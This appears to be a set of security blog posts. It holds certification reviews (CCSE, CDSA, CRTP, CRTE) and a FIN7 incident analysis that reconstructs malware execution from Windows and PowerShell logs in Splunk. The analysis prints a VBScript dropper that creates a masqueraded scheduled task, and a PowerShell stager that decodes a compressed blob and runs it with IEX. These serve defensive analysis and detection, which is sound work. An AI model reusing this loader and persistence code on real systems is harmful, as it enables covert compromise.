Going Deeper into Code Review, Reverse Engineering, and Web Exploitation

New year, new focus. This year I’m pushing myself to level up in three specific areas: code review, reverse engineering, and web exploitation. I’ve spent enough time doing surface-level testing, now I want to understand what’s actually happening under the hood. I’ve already invested in the learning materials to make this happen, so there’s no backing out now.

The Reading List

First up is Eugene Lim’s “From Day Zero to Zero Day.” This book covers exactly what I need; code review, reverse engineering, and fuzzing. It’s rare to find one resource that hits all three topics I’m targeting, so this felt like the perfect starting point.

The Course Lineup

I picked up four courses from Cyberwarfare Labs that align with where I want to go:

Certified Windows Internals Red Team Operator (CWI-RTO) – I’m already working through this one. It’s teaching me about Windows internals, Win32 and NT APIs (the ones malware loves to abuse), user-mode malware analysis, and kernel data structures using WinDbg. Understanding EPROCESS, ETHREAD, and KPCR has been eye-opening so far.

Certified Exploit Development Professional (CEDP) – This is where I’ll get my hands dirty with exploit development. The focus is on stack exploitation techniques, which I’ve dabbled in before but never properly mastered.

Certified Enterprise Security Controls Attack Specialist (CESC-AS) – I grabbed this during Black Friday when the price dropped significantly. It covers advanced penetration testing, offensive C# tradecraft, Windows API abuse, and deeper Active Directory attacks. Honestly, the discount made it impossible to pass up.

Certified Stealth Cyber Operator (CSCO) – The final boss. Also a Black Friday purchase. This one is packed: red team infrastructure setup, abusing misconfigured security controls, offensive tradecraft development using C, C++, and C#, and techniques for bypassing endpoint security like AV and EDR. It’s ambitious, but that’s the point.

Web Exploitation To round things out, I’m planning to tackle the HTB Certified Web Exploitation Expert (HTB CWEE). This will push my web exploitation skills further with advanced injection attacks, NoSQL injection, XSS and CSRF exploitation, whitebox testing, and more.

The Reality Check

Looking at this list, I know it’s a lot. I’m not expecting to finish everything in one year, but having a clear roadmap helps. The goal isn’t just to collect more certifications, it’s to genuinely understand these topics at a deeper level and apply them in real scenarios.

I’ll be documenting what I learn along the way, sharing the challenges I hit, and posting walkthroughs when things click. If you’re working on similar goals or have advice on any of these topics, I’d love to hear from you.

Let’s see where 2026 takes us.

I recently completed the Certified Cyber Security Engineer (CCSE) certification from Cyberwarfare Labs, and I wanted to share my experience with anyone considering this certification. Even though I already hold more advanced certifications like the OSCP and HackTheBox CPTS, I found the CCSE to be a valuable addition to my skill set, and here’s why.

What is the CCSE?

The Certified Cyber Security Engineer (CCSE) is a comprehensive penetration testing certification offered by Cyberwarfare Labs. What makes it stand out is its broad coverage of modern attack surfaces that many traditional pentesting certifications don’t touch. It’s designed for beginner to intermediate cybersecurity professionals who want to develop a well-rounded understanding of various technologies and attack vectors they’ll encounter as a cybersecurity engineer.

Course Content: 14 Modules of Comprehensive Coverage

The CCSE breaks down into 14 modules that cover everything from fundamentals to specialized topics:

What really sets this course apart is its coverage of cloud penetration testing, Docker container exploitation, mobile application testing, and Wi-Fi security. These are areas that neither the OSCP nor the CPTS covered when I took them, making the CCSE a valuable complement to those certifications.

While the course doesn’t go extremely deep into these specialized topics, it provides enough foundational knowledge to get you started. I think this was intentional, especially since Cyberwarfare Labs offers more advanced certifications focused specifically on cloud penetration testing. For a certification targeting beginner to intermediate professionals, this breadth makes perfect sense, as a cybersecurity engineer, you need exposure to a wide range of technologies.

The Learning Experience

Lab Environment

The lab environment was fantastic. I experienced zero downtime or issues throughout my entire learning period, which is more than I can say for some other certification labs I’ve used.

The labs come in two formats:

VM-Based Labs: These are for modules that require local setup on your own machine, including scripting/programming, OSINT, phishing, exploit development, cloud pentesting, Docker pentesting, mobile pentesting, and Wi-Fi pentesting. The great thing about this approach is that you can experiment freely, break things, and test additional techniques you’ve researched without worrying about affecting a shared environment.

My favorite was the Wi-Fi penetration testing module. Wi-Fi testing typically requires specific hardware and setup to put your network interface in monitoring mode and capture packets. Here, you’re provided with a complete simulated Wi-Fi environment, so you can follow along with all the lab exercises without needing special equipment. Every lab also comes with a walkthrough, so if you get stuck, you can refer to it for guidance.

VPN-Based Labs: These are deployed on Cyberwarfare Labs’ infrastructure. You just download your VPN configuration file and connect to work on labs for web application exploitation, network exploitation, and Active Directory pentesting. These labs were really enjoyable, and I appreciated that you can use any tools you’re comfortable with, not just the ones covered in the course material.

Course Materials

The course provides both video content and PDF documents that you can read offline. I genuinely enjoyed all the modules, there was always something new to learn, even with my existing experience. The OSINT and phishing modules were particularly impressive, with the instructor demonstrating some real depth of knowledge in these areas.

The exploit development module also stood out. I enjoyed it so much that I purchased two of their dedicated exploit development courses, which I’m already working through. Expect a review of those as well once I complete them.

Exam Preparation

One of the best aspects of this certification is that you don’t need external resources to prepare for the exam. Everything you need to pass is covered in the 14 modules. Don’t underestimate the amount of content here, 14 modules with multiple sub-topics each adds up to a substantial amount of material.

My approach was to go through all the videos and PDFs before requesting lab access. I made detailed notes of commands and techniques covered in each module. These notes aren’t just helpful for the exam, they’re reference material you’ll use during real-world engagements and red team assessments, as the techniques taught are based on actual penetration testing methodologies.

The Exam Experience

The exam is structured like a real-world penetration test: 24 hours to complete the assessment, followed by another 24 hours to write a detailed report of your findings.

The exam lab authentically mimics an enterprise network. You perform both external and internal penetration testing, and you’re required to document everything with step-by-step reproduction instructions so the examiner can verify your findings without difficulty.

I started my exam on Saturday, November 29th, at 10:00 AM. By 5:40 PM, I had fully compromised the exam lab, a total of just under 8 hours. This was largely due to my previous experience with certifications like OSCP and CPTS. However, if you’re a beginner, don’t worry. Everything you need to succeed is covered in the course materials. If you get stuck, take a break and refer back to the study materials.

After finishing the technical portion, I took a short break and then spent 4-5 hours crafting my report. My advice: take lots of screenshots as you progress through the exam, and jot down notes in your favorite note-taking tool. This makes assembling the final report much easier. I submitted a detailed 34-page report and received my passing results four days later, faster than I expected, though they guarantee results within seven days.

Comparison with Other Certifications

In terms of exam difficulty, I’d place the CCSE between the OSCP and the PNPT.

Content-wise, the CCSE has a significant advantage over both. The inclusion of cloud pentesting, Docker container exploitation, mobile application testing, and Wi-Fi security topics not covered in the OSCP or PNPT when I took them, makes it particularly valuable for building a broad skill set.

Cost-wise, the CCSE is extremely affordable. The full price is $199, but they frequently run promotions. I purchased mine during a sale at a lower cost, and during Black Friday, they dropped the price to just $29 for a limited time. For comparison:

• OSCP: The Course & Certification Bundle (PEN-200 with 90 days of lab access and one exam attempt) costs around $1,749.
• PNPT: TCM Security’s PNPT certification with training costs $499

Given these price differences, the CCSE offers incredible value for the content you receive. However, since it doesn’t yet have the same industry recognition as the OSCP or PNPT, I’d recommend waiting for a discount or special sale to purchase it.

Final Thoughts

I highly recommend this certification to cybersecurity professionals at any level beginner, intermediate, or even seasoned professionals. There’s always something new to learn, especially at this price point. If you’re just getting started with penetration testing or want to learn about mobile, Docker, and cloud pentesting without committing to more expensive certifications, the CCSE is an excellent choice.

The combination of comprehensive content, excellent lab infrastructure, and affordable pricing makes the CCSE a valuable certification for anyone looking to broaden their penetration testing skill set. While it may not carry the same weight as an OSCP on a resume, the practical knowledge and diverse attack surface coverage make it well worth the investment especially when purchased during a promotion.

A Clear Overview of the CDSA Certification

In this post, I’ll share my experience with the HTB Certified Defensive Security Analyst (CDSA) certification. Whether you’re new to blue teaming or already familiar with CDSA, there’s something here for everyone.

What is the HTB CDSA?

The Hack The Box Certified Defensive Security Analyst (CDSA) is a hands-on blue-team certification focused on real-world SOC operations. It evaluates your ability to monitor, investigate, detect, and respond to threats using enterprise-grade tools and realistic scenarios. The exam is fully practical and is directly based on the HTB Academy SOC Analyst role path.

Who Should Pursue It?

The CDSA is ideal for:

• Future or current SOC Analysts, DFIR analysts, and Threat Hunters
• Penetration testers or red teamers who want a defender’s perspective
• Cybersecurity learners who prefer real labs instead of theory
• Anyone who wants real experience with SIEMs, logs, and incident workflows

If you want to understand how defenders detect and respond to attacks, this certification is absolutely worth it.

Knowledge Domains Evaluated

The CDSA assesses skills across major defensive domains, all of which map directly to real SOC work:

• SOC Processes & Methodologies
• SIEM Operations (ELK / Splunk)
• Tactical Analytics
• Log Analysis
• Threat Hunting
• Active Directory Attack Analysis
• Network Traffic Analysis (incl. IDS/IPS)
• Malware Analysis
• DFIR Operations

This range makes CDSA highly complementary to offensive knowledge, giving you insight into how attacks are detected and where defenses often fail.

The HTB SOC Analyst Path (Modules & Duration)

The SOC Analyst role path contains 15 modules. Hack The Box estimates 23 days of work, but realistically it may take longer. It took me around 1.5 months to complete the entire path thoroughly.

Module List

1. Incident Handling Process
2. Security Monitoring & SIEM Fundamentals
3. Windows Event Logs & Finding Evil
4. Introduction to Threat Hunting & Hunting With Elastic
5. Understanding Log Sources & Investigating with Splunk
6. Windows Attacks & Defense
7. Intro to Network Traffic Analysis
8. Intermediate Network Traffic Analysis
9. Working with IDS/IPS
10. Introduction to Malware Analysis
11. JavaScript Deobfuscation
12. YARA & Sigma for SOC Analysts
13. Introduction to Digital Forensics
14. Detecting Windows Attacks with Splunk
15. Security Incident Reporting

Completion of the full role path is mandatory before taking the exam. Each module combines theory with hands-on labs and real-world scenarios.

Why I Decided to Pursue a Blue-Team Certification

Coming from a pentesting/red-team background, I wanted to understand:

• How defenders detect and respond to the attacks I usually perform
• How SIEM and alert triage works at scale
• How to write better, more actionable reports
• How to identify detection gaps and strengthen defense
• The practical side of malware analysis and DFIR

CDSA opened up new perspectives especially toward malware analysis and reverse engineering and improved how I approach future offensive engagements.

Requirements Before Taking the Exam

While there are no strict prerequisites, for a smooth experience you should have:

• Basic Windows & Linux internals knowledge
• Comfort with command-line investigation
• General understanding of networking
• Familiarity with SIEM concepts
• Willingness to adopt an analyst mindset (triage → analyze → report)

The most important requirement is completing the SOC Analyst role path, which the exam is built upon.

Exam Preparation

Based on my experience, here’s what I highly recommend:

🔹 Revisit All Modules Thoroughly

Go through the modules again, including labs and exercises. The exam mirrors the Academy content closely.

🔹 Redo Skills Assessments

Repeating them helps you absorb the workflows and techniques deeply.

🔹 Master the SIEM Tools

Expect to use ELK and Splunk logs just like covered in the modules. Crafting and interpreting queries will be central.

🔹 Create a Query & Command Cheat Sheet

Include:

• SPL
• KQL
• Elastic queries
• Common forensic commands
• YARA & Sigma syntax

🔹 Review Incident Reporting Multiple Times

Blue-team reporting is detailed and process-driven. If you come from offense, this is a shift. I reviewed this module several times and read the external resources HTB recommended.

🔹 Take Many Screenshots

Everything you do in the exam should be:

• reproducible
• documented
• supported with screenshots

It will save you hours during reporting.

Exam Experience

I went all-in on this exam and genuinely had a great time.

• Start date: November 3rd
• Day 3: Reached the passing score (80 points)
• Day 4: Hit 95 points (19/20 flags)
• One task defeated me, it will haunt me forever (lol)

Use the HTB Academy search feature, it helped me quickly recall concepts when stuck.

Passing Requirements

• At least 16/20 flags
• A clean, detailed, reproducible report

Reporting

I took my time with the report because I wanted everything to be crystal clear. Good screenshots and step-by-step reasoning make the reviewer’s job easier.

Results

I submitted my report on November 10th. Even though results are supposed to take up to 20 business days, I got my result the next day 1 business day.Super impressive turnaround.

Recommendation

I highly recommend the CDSA to anyone wanting to:

• Break into blue teaming
• Learn SOC analysis the right way
• Strengthen detection engineering and threat hunting skills
• Gain hands-on DFIR and malware analysis exposure
• Improve their offensive thinking through defensive understanding

One of my favorite modules was Introduction to Malware Analysis, it sparked a genuine interest in Reverse Engineering and malware research, and I hope HTB adds more advanced modules in this area.

Final Thoughts

CDSA is one of the most enjoyable blue-team certifications I’ve done. It sharpened my skills, expanded my defensive mindset, and made me appreciate the amount of work SOC teams handle daily.

Whether you’re a defender or an attacker, this certification will make you better at your craft.

Two years ago, I embarked on a challenging journey that would fundamentally transform my understanding of Active Directory security and red teaming. Today, I want to share my experience with two exceptional certifications from Altered Security: the Certified Red Team Professional (CRTP) and the Certified Red Team Expert (CRTE).

Why I Chose These Certifications

As someone looking to build a solid foundation in Active Directory penetration testing, I was drawn to Altered Security’s reputation for creating realistic, hands-on environments. Unlike many other certifications that rely heavily on theoretical knowledge or outdated exploitation techniques, both CRTP and CRTE focus on abusing legitimate Active Directory features and functionalities in fully patched environments.

CRTP: My First Step into Active Directory Red Teaming

The Learning Experience

The CRTP served as my introduction to Active Directory security, covering 23 learning objectives across 59 tasks with over 120 hours of content. The course structure was comprehensive, covering everything from basic enumeration to advanced cross-trust attacks:

• Active Directory Enumeration
• Offensive PowerShell and .NET Tradecraft
• Local and Domain Privilege Escalation
• Lateral Movement Techniques
• Domain Persistence and Cross Trust Attacks
• Active Directory Certificate Services (AD CS) Abuse

The lab environment simulated a fictional financial services company with fully patched Server 2022 machines running Windows Defender, multiple forests and domains, and Server 2016 Forest Functional Level. What impressed me most was the realistic nature of the environment with minimal firewall restrictions allowed for focusing on core concepts rather than dealing with artificial barriers.

Tools and Methodology

The attack methodology followed a logical progression: Reconnaissance → Domain Enumeration → Local Privilege Escalation → Admin Reconnaissance → Lateral Movement → Domain Admin Privileges → Cross Trust Attacks → Persistence and Exfiltration.

I worked with industry-standard tools including:

• Enumeration: ActiveDirectory PowerShell Module, BloodHound, PowerView, and SharpView
• Privilege Escalation: PowerUp, PrivescCheck, and WinPEAS
• Lateral Movement: PowerShell Remoting, WinRS, Mimikatz, SafetyKatz, Impacket, and Rubeus

The Exam Challenge

The CRTP exam was intense. Starting on October 21st, I spent 16 out of the allocated 24 hours compromising the exam environment. As my first Active Directory certification, the pressure was immense, but the hands-on nature of the challenge made it incredibly engaging.

After completing the technical portion, I had another 24 hours to compile a comprehensive report. My final submission was 50 pages of meticulously detailed step-by-step instructions that would allow examiners to replicate my attacks without issues. I submitted on October 23rd and received my results on October 28th a nerve-wracking wait that ended in success.

Credential Link: Here

CRTE: Taking It to the Next Level

Advanced Concepts and Deeper Challenges

Building on the CRTP foundation, the CRTE pushed me into intermediate and expert-level territory. With 30 learning objectives across 62 tasks and over 300 hours of content, this certification demanded significantly more time and expertise.

The lab environment centered around “Techcorp,” a fictional critical technology company with segregated Active Directory forests across different departments, locations, and vendors. The environment featured almost fully patched Server 2019 machines with Server 2016 Forest Functional Level, creating a true enterprise-like challenge.

Extended Exam Experience

The CRTE exam format provided 48 hours for the hands-on portion a welcome change that allowed for more thorough exploration and rest periods. Starting on December 16th, I utilized 32 of the 48 available hours to completely compromise the exam environment.

The extended timeframe proved crucial for implementing various advanced techniques and exploring different attack vectors. After another 48-hour reporting period, I submitted my 50-page report on December 20th and received confirmation of success on December 23rd.

Credential Link: Here

The Real-World Impact

Practical Applications

The knowledge gained from both certifications proved invaluable in subsequent challenges. When I later pursued the OSCP, the Active Directory components became trivial thanks to the solid foundation these courses provided. Similarly, completing HackTheBox’s Offshore Pro Lab was significantly easier due to the advanced techniques learned through CRTE.

Career Benefits

Both certifications have established themselves as industry-recognized credentials. CRTP, in particular, has become a prerequisite for numerous job postings and is recognized by various industrial bodies and governments globally. The hands-on nature of both certifications demonstrates practical competency rather than just theoretical knowledge.

Key Takeaways and Recommendations

What Sets These Apart

1. Realistic Environments: Both labs simulate actual enterprise environments with proper patching and security controls
2. Feature Abuse Focus: Instead of relying on patchable exploits, these courses teach how to abuse legitimate AD functionality
3. Comprehensive Support: Lab manuals, video walkthroughs, and detailed documentation provide excellent learning support
4. Progressive Difficulty: CRTP builds the foundation while CRTE advances to expert-level concepts

Who Should Consider These Certifications

• Beginners looking for a solid introduction to Active Directory security (start with CRTP)
• Intermediate professionals wanting to advance their red teaming skills (CRTE)
• Anyone preparing for other certifications like OSCP or OSEP
• Security professionals working in environments with complex Active Directory implementations

Final Thoughts

Looking back two years later, I can confidently say that the CRTP and CRTE certifications were transformative experiences that significantly elevated my Active Directory security expertise. The hands-on methodology, realistic environments, and focus on feature abuse rather than exploit development provided practical skills that continue to serve me well in real-world engagements.

If you’re considering advancing your Active Directory red teaming skills, I highly recommend both certifications. The investment in time and effort pays dividends in practical knowledge and career advancement opportunities. The assume breach methodology and internal adversary perspective these courses provide are invaluable for understanding how modern Active Directory environments can be compromised and secured.

The journey was challenging, time-consuming, and occasionally frustrating, but ultimately rewarding. Two years later, the techniques and methodologies I learned continue to be relevant and applicable in today’s evolving threat landscape.

Introduction

In Part 2, we pivot from initial access to what happened next. Using Windows event logs and PowerShell Operational logs in Splunk, we reconstructed FIN7’s execution chain after persistence via a scheduled task, validated key artifacts, and built practical detections you can run.

What we investigated

• Scheduled Task execution timing and payload
• Process tree spawned by the persisted loader
• PowerShell script executions including repeated stagers
• Reconstruction of the staged PowerShell from events (4104) and file hashing for IOC tracking

Interpretation of the Decoded Script from Initial Access (Recap)

what we have got here is essentially a decoded RTF payload that was obfuscated using \chr encoding. Once decoded, it reveals a malicious VBScript designed to drop and persist a RAT (remote access trojan). Lets break down the key points :

1. Initial Setup

Dim cntent1, contnt2
Dim oFSO, wshShel
Set wshShel = CreateObject("Wscript.Shell")

• The script initializes objects for file system operations and Windows shell execution.
• This is a common start for malware written in VBScript.

2. Extracting Payload from Word Document

contnt1 = w.ActiveDocument.Shapes(4).TextFrame.TextRange.Text
content = w.ActiveDocument.Shapes(5).TextFrame.TextRange.Text

• The malicious payload hides its real code inside Word document shapes.
• The script reads text content from shape objects — a stealthy way to embed payload data inside a seemingly normal RTF/Word file.

3. Dropping the RAT File

outFile = strLocalAppData + "sql-rat.js"
Set objFile = oFSO.CreateTextFile(outFile, True)
objFile.WriteLine content1
objFile.WriteLine content2
objFile.Close

• The extracted payload (content1 + content2) is written to disk as sql-rat.js in the %LOCALAPPDATA% folder.
• This is the actual JavaScript RAT backdoor.

4. Copying & Masquerading as a System Binary

oFSO2.CopyFile "C:\Windows\System32\wscript.exe", strLocalAppData + "adb156.exe"

• Copies the legitimate wscript.exe binary into the local appdata directory but under a new name (adb156.exe).
• Likely used to bypass security controls or run the RAT with trusted binary masquerading.

5. Persistence via Scheduled Task

Set service = CreateObject("Schedule.Service")
service.Connect()
Set rootFolder = service.GetFolder("\")
Set taskDefinition = service.NewTask(0)
...
Call rootFolder.RegisterTaskDefinition("Micriosoft Update Service", taskDefinition, 6, , 3)

• Creates a scheduled task disguised as “Micriosoft Update Service”.
• The task is set to run daily, starting a few minutes after infection, ensuring persistence.
• The scheduled action runs the dropped adb156.exe with the sql-rat.js file as input.

SQL-Rat

SQL-Rat is a Microsoft SQL-based command and control (C2) remote access trojan (RAT). Due to its novel approach, it avoids leaving traditional host artifacts often associated with RATs. SQL-Rat is usually deployed as a result of a Visual Basic Script (VBScript) in a malicious document. The client is written in a mixture of JavaScript and VBScript, often executed via a scheduled task.

FIN7 was observed deploying this strain of malware as early as 2018 and continued to use it for a period of time.

Post-Compromise Findings from Event Log (Splunk)

This Splunk log ties the decoded payload to real host execution.

• To Find the task creation and definition details we used the splunk query below:

index=wineventlog (EventCode=4698 OR process_command_line="*Schedule.Service*")
| table _time ComputerName TaskName Command Author Description

• Command output

Task Information: 
Task Name: \Micriosoft Update Service 
Task Content: <?xml version="1.0" encoding="UTF-16"?> 
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> 
  <RegistrationInfo> 
    <Author>system</Author> 
    <Description>Micriosoft Update Service</Description> 
    <URI>\Micriosoft Update Service</URI>
  </RegistrationInfo> 
  <Triggers> 
    <CalendarTrigger id="DailyTriggerId"> 
      <StartBoundary>2021-07-13T17:23:35</StartBoundary> 
      <EndBoundary>2024-04-18T09:10:00</EndBoundary> 
      <Enabled>true</Enabled> 
      <ScheduleByDay> 
        <DaysInterval>1</DaysInterval> 
      </ScheduleByDay> 
    </CalendarTrigger>
  </Triggers>

<Actions Context="Author"> 
  <Exec> 
    <Command>C:\Users\jessie\AppData\Local\adb156.exe</Command> 
    <Arguments>/b /e:jscript C:\Users\jessie\AppData\Local\sql-rat.js</Arguments> 
  </Exec> 
</Actions>

From the Windows Security Event 4698 (scheduled task creation), we can extract the following details:

1. Scheduled Task Name

\Micriosoft Update Service

• The typo in “Micriosoft” a classic masquerading technique used to blend in with legitimate Microsoft services.

2. Scheduled Task Run Time

<StartBoundary>2021-07-13T17:23:35</StartBoundary>
<DaysInterval>1</DaysInterval>

• The task was set to first execute at 17:23:35 (5:23 PM) on July 13, 2021, and then repeat daily.
• This aligns with the decoded script’s persistence logic (delayed by ~5 minutes from infection time).

3. Executable Run by the Scheduled Task

C:\Users\jessie\AppData\Local\adb156.exe
Arguments: /b /e:jscript C:\Users\jessie\AppData\Local\sql-rat.js

• The scheduled task runs a renamed copy of wscript.exe (adb156.exe), pointing it to the dropped JavaScript RAT payload sql-rat.js.
• This confirms persistence + RAT execution on the compromised endpoint.

Post-Compromise Process Execution Analysis (Splunk)

Here we are correlating the persistence (scheduled task creation) with actual process execution. Let’s break this Event ID 4688 (process creation) down into actionable intelligence.

• Splunk query used:

index=wineventlog (EventCode=4688 OR EventCode=1) "adb156.exe" 
New_Process_Name="C:\\Users\\jessie\\AppData\\Local\\adb156.exe"

• Output result

Process Information:
	New Process ID:		0x1318
	New Process Name:	C:\Users\jessie\AppData\Local\adb156.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		S-1-16-12288
	Creator Process ID:	0x704
	Creator Process Name:	C:\Windows\System32\svchost.exe
	Process Command Line:	C:\Users\jessie\AppData\Local\adb156.exe /b /e:jscript C:\Users\jessie\AppData\Local\sql-rat.js

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.

1. Process Created

New Process Name: C:\Users\jessie\AppData\Local\adb156.exe
Process Command Line: C:\Users\jessie\AppData\Local\adb156.exe /b /e:jscript C:\Users\jessie\AppData\Local\sql-rat.js

• Confirms execution of the renamed wscript.exe (adb156.exe).
• Arguments show it is running the JavaScript RAT (sql-rat.js) payload.
• This matches perfectly with the decoded script and scheduled task configuration.

2. Execution Context

Creator Process Name: C:\Windows\System32\svchost.exe
Creator Process ID: 0x704

• The process was launched by svchost.exe, which is consistent with execution via a scheduled task service.
• Indicates the malware was not manually run by the user, but automatically executed through Windows Task Scheduler.

3. Security Context

Mandatory Label: S-1-16-12288 (High Mandatory Level)
Token Elevation Type: %%1936

• High Mandatory Level (12288) suggests it was executed with elevated privileges.
• Token elevation type points to Type 2: elevated token (process running with admin rights due to UAC elevation or service execution).
• This gave the RAT higher privileges on the host, increasing its ability to persist and evade.

PowerShell Child Process Activity (Splunk)

Now we’re getting into the post-exploitation stage, where the attacker is trying to expand control. The Event ID 4688 (process creation) shows how the dropped RAT (adb156.exe) attempts to execute PowerShell payloads.

• Splunk query used:

index=wineventlog EventCode=4688 Creator_Process_ID="0x1318"
( New_Process_Name="*\\powershell.exe" OR New_Process_Name="*\\pwsh.exe"
  OR Process_Command_Line="*powershell*" OR Process_Command_Line="*.ps1" )
| stats dc(New_Process_ID) AS PowerShellAttempts

This query pivoted on the Creator_Process_ID 0x1318, which we previously identified as adb156.exe (the renamed wscript.exe RAT). It shows the RAT spawned child processes that invoked PowerShell, an indicator of scripted post-exploitation activity.

• Output result:

Process Information:
	New Process ID:		0x11ec
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		S-1-16-12288
	Creator Process ID:	0x1318
	Creator Process Name:	C:\Users\jessie\AppData\Local\adb156.exe
	Process Command Line:	"C:\Windows\system32\cmd.exe" /C powershell.exe -ExecutionPolicy Bypass -NoExit -File  c:\Users\Jessie\AppData\Local\stager.ps1 > C:\Users\jessie\AppData\Local\Temp\rad3CFC9.tmp 2>&1

Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.

Type 1 is a full token with no privileges removed or groups disabled.  A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.

Type 2 is an elevated token with no privileges removed or groups disabled.  An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.  An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.

Type 3 is a limited token with administrative privileges removed and administrative groups disabled.  The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.

1. Parent Process

Creator Process ID: 0x1318
Creator Process Name: C:\Users\jessie\AppData\Local\adb156.exe

• Confirms that the PowerShell activity originated from the RAT process.
• Shows a direct lineage from the malicious scheduled task to PowerShell execution.

2. Child Process

New Process Name: C:\Windows\System32\cmd.exe
Process Command Line: "C:\Windows\system32\cmd.exe" /C powershell.exe -ExecutionPolicy Bypass -NoExit -File c:\Users\Jessie\AppData\Local\stager.ps1 > C:\Users\jessie\AppData\Local\Temp\rad3CFC9.tmp 2>&1

• The RAT used cmd.exe as an intermediary launcher to execute PowerShell.
• PowerShell ran with:
  • -ExecutionPolicy Bypass → disables script execution restrictions.
  • -File c:\Users\jessie\AppData\Local\stager.ps1 → runs a local stager script.
  • Output redirected to Temp\rad3CFC9.tmp for logging/error suppression. This indicates the RAT was likely retrieving or staging additional payloads via PowerShell.

3. Execution Context

Token Elevation Type: %%1936
Mandatory Label: S-1-16-12288 (High Mandatory Level)

• Runs at a high integrity level with elevated privileges.
• Confirms the RAT has administrative-level execution on the system.

Rebuilding the PowerShell Stager Script (Splunk)

We pivoted to PowerShell Operational logs (EventCode 4104) to capture script block logging events. These logs revealed that the malicious PowerShell stager executed on the host was split across three separate script block entries.

• Splunk query used:

index=wineventlog source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode=4104

This query pulled all script block logging events for review.

• Output result script block 1:

7/14/21
8:41:53.000 AM	
07/14/2021 01:41:53 AM
LogName=Microsoft-Windows-PowerShell/Operational
EventCode=4104
EventType=3
User=NOT_TRANSLATED
Sid=S-1-5-21-1598541164-267006594-3813999592-1154
SidType=0
SourceName=Microsoft-Windows-PowerShell
Type=Warning
RecordNumber=8534
Keywords=None
TaskCategory=Execute a Remote Command
OpCode=On create calls
Message=Creating Scriptblock text (1 of 3):
$EncodedCompressedFile = @'

7b1pk+LKcjD83RH3P5y4cT/Y0ddusfXAfcMRT5U2JJCgBBJIDn8AAQIklmmgBfz6N7<SNIP>

ScriptBlock ID: 21582107-1a53-41ba-9a55-a11cf70fce1b
Path: C:\Users\Jessie\AppData\Local\stager.ps1

• Output result script block 2:

7/14/21
8:41:53.000 AM	
07/14/2021 01:41:53 AM
LogName=Microsoft-Windows-PowerShell/Operational
EventCode=4104
EventType=3
User=NOT_TRANSLATED
Sid=S-1-5-21-1598541164-267006594-3813999592-1154
SidType=0
SourceName=Microsoft-Windows-PowerShell
Type=Warning
RecordNumber=8535
Keywords=None
TaskCategory=Execute a Remote Command
OpCode=On create calls
Message=Creating Scriptblock text (2 of 3):
KQELvDrDDYa+rKtDAcC9Kd+s8/xqFgexNgm9MsuphHRTlaDZv1rx5hBmtifFuOac5qU11<SNIP>

'@

$Decoded = [System.Convert]::FromBase64String($EncodedCompressedFile)
$MemStream = New-Object System.IO.MemoryStream
$MemStream.Write($Decoded, 0, $Decoded.Length)
$MemStream.Seek(0,0) | Out-Null
$CompressedStream = New-Object System.IO.Compression.DeflateStream($MemStream, [System.IO.Compression.CompressionMode]::Decompress)
$StreamReader = New-Object System.IO.StreamReader($CompressedStream)
$Output = $StreamRead

ScriptBlock ID: 21582107-1a53-41ba-9a55-a11cf70fce1b
Path: C:\Users\Jessie\AppData\Local\stager.ps1

• Output result script block 3:

7/14/21
8:41:53.000 AM	
07/14/2021 01:41:53 AM
LogName=Microsoft-Windows-PowerShell/Operational
EventCode=4104
EventType=3
User=NOT_TRANSLATED
Sid=S-1-5-21-1598541164-267006594-3813999592-1154
SidType=0
SourceName=Microsoft-Windows-PowerShell
Type=Warning
RecordNumber=8536
Keywords=None
TaskCategory=Execute a Remote Command
OpCode=On create calls
Message=Creating Scriptblock text (3 of 3):
er.readtoend()
$Output | IEX

ScriptBlock ID: 21582107-1a53-41ba-9a55-a11cf70fce1b
Path: C:\Users\Jessie\AppData\Local\stager.ps1

Script Reconstruction Process

1. Identified log entries with messages such as:

Message=Creating Scriptblock text (1 of 3):
Message=Creating Scriptblock text (2 of 3):
Message=Creating Scriptblock text (3 of 3):

2. Extracted each script block part.
3. Reassembled the three fragments into a single PowerShell script (stager.ps1).
4. Generated a file hash to serve as an Indicator of Compromise (IoC).

Result

• Reconstructed File: stager.ps1

$EncodedCompressedFile = @'

7b1pk+LKcjD83RH3P5y4cT/Y0ddusfXAfcMRT5U2JJCgBBJIDn8AAQIklmmgBfz6N7O00sCcnuu<SNIP>

'@

$Decoded = [System.Convert]::FromBase64String($EncodedCompressedFile)
$MemStream = New-Object System.IO.MemoryStream
$MemStream.Write($Decoded, 0, $Decoded.Length)
$MemStream.Seek(0,0) | Out-Null
$CompressedStream = New-Object System.IO.Compression.DeflateStream($MemStream, [System.IO.Compression.CompressionMode]::Decompress)
$StreamReader = New-Object System.IO.StreamReader($CompressedStream)
$Output = $StreamReader.readtoend()
$Output | IEX

• MD5 Hash:

kali@kali:~/Desktop$ nano stager.ps1
kali@kali:~/Desktop$ file stager.ps1 
stager.ps1: ASCII text, with very long lines (25988)
kali@kali:~/Desktop$ md5sum stager.ps1 
d12fdacbf70273e848219facc444ddbc  stager.ps1 

This confirmed that the RAT attempted to stage and execute additional malicious payloads through PowerShell. Logging and reassembling the script allowed us to both analyze attacker intent and derive strong IoCs for detection and hunting.

Quick Checklist recap

1. Scheduled Task run time: 17:23:35
2. Executable run by the Task: adb156.exe
3. Process ID of the Task’s executable: 0x1318
4. Child processes attempting to run PowerShell: 3
5. PowerShell script run: stager.ps1
6. MD5 of rebuilt stager.ps1: d12fdacbf70273e848219facc444ddbc

Conclusion

